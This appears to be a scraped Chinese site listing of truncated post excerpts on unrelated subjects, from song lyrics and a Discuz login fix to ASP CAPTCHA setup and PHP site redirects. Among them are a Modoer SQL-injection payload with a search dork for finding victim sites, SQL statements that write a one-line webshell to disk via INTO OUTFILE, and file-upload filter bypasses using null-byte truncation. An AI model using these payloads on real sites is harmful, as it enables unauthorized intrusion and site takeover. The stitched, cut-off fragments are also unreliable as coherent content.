君生我未生，我生君已老恨不生同时，日日与君好何时能再见，纯白如羽的华裳还有那素净如莲的脸庞风沙漫夜幕，月光沁石墓叹朝朝暮暮，长生惹谁慕愿在君身旁，挥剑带落红棘花把酒对天唱，飞舞纵黄沙长河落日艳，映逝去荒颜大漠升孤烟，魂随风湮灭我只能奢望，陪君看血色残阳只能够幻想，白衣袂飞扬（重复一遍）君给的希望，如萨朗鹰般翱翔难追难到达，在梦中徜徉这是沫沫空间的一首歌，沧月题的词。起初，只是无意中听到，无甚感觉。…

问题一：用户不能登陆，需要激活 情况是这样的，我想将ID从2-20的用户名全部改成指定的，我是直接在phpmyadmin里面更改cdb_members 表的，结果更改完后，用户登陆失败，也没有什么特别的提示。于是去官方查了相关资料，恍然大悟，原来与之对应的ucenter还有一个用户表cdb_uc_members ，打开一看，果然，此表ID后的用户名却还是未更改前的，于是，我将此表用户名更改成与cd…

演示站点：http://www.xxxxx.com 关键字：Powered by Modoer site:.com (可以根据需求自行拿站) 测试漏洞: ajax.php?action=digg&idtype=shop&keyid=* FROM modoer_admin Where id=1 and substring((Select adminname FROM modoer_a…

一、先下载验证码所需要的文件 附件：imgchk(asp验证代码).rar(91645 Byte) 该压缩包为 imgchk 文件夹 ，其中有三个文件：validatecode.asp、validatebody.fix、validatehead.fix，主要即是为生成验证码服务的。 将解压文件夹直接释放在需要在某页添加验证码的同目录下（比如 addnew.asp 需要添加验证码，该文件在 cnbr…

Drop TABLE IF EXISTS temp; //如果存在temp表就删掉 Create TABLE temp(cmd text NOT NULL); //建立temp表，里面就一个cmd字段 Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表 Select cmd from temp into out file '…

PHP版： 先建立一个默认页面index.php 然后把A站放在A文件夹下 B站放在B文件夹下 C站放在C文件夹下 其它index.php内容如下： <?php    switch ($_SERVER["HTTP_HOST"])    {    case "www.a.com":    header("location:a/index.php");    break;    case "ww…

方法一： 本地上传，修改action的地址为上传页面并且在路径后面加上*.asp;或者加个. (此法已测试成功) 方法二： 即截断，直接在路径后面加*.asp空格，然后在16进制下面将20改为00.然后抓包NC上传。这里要切记如果文件大小有变化，一定要修改包的大小。 作者觉得此方法亦较复杂，遂另辟蹊径寻得一好方法，具体如下(此乃重点)： 1、首先需要安装opera游览器(非IE内核) 2、找到一处…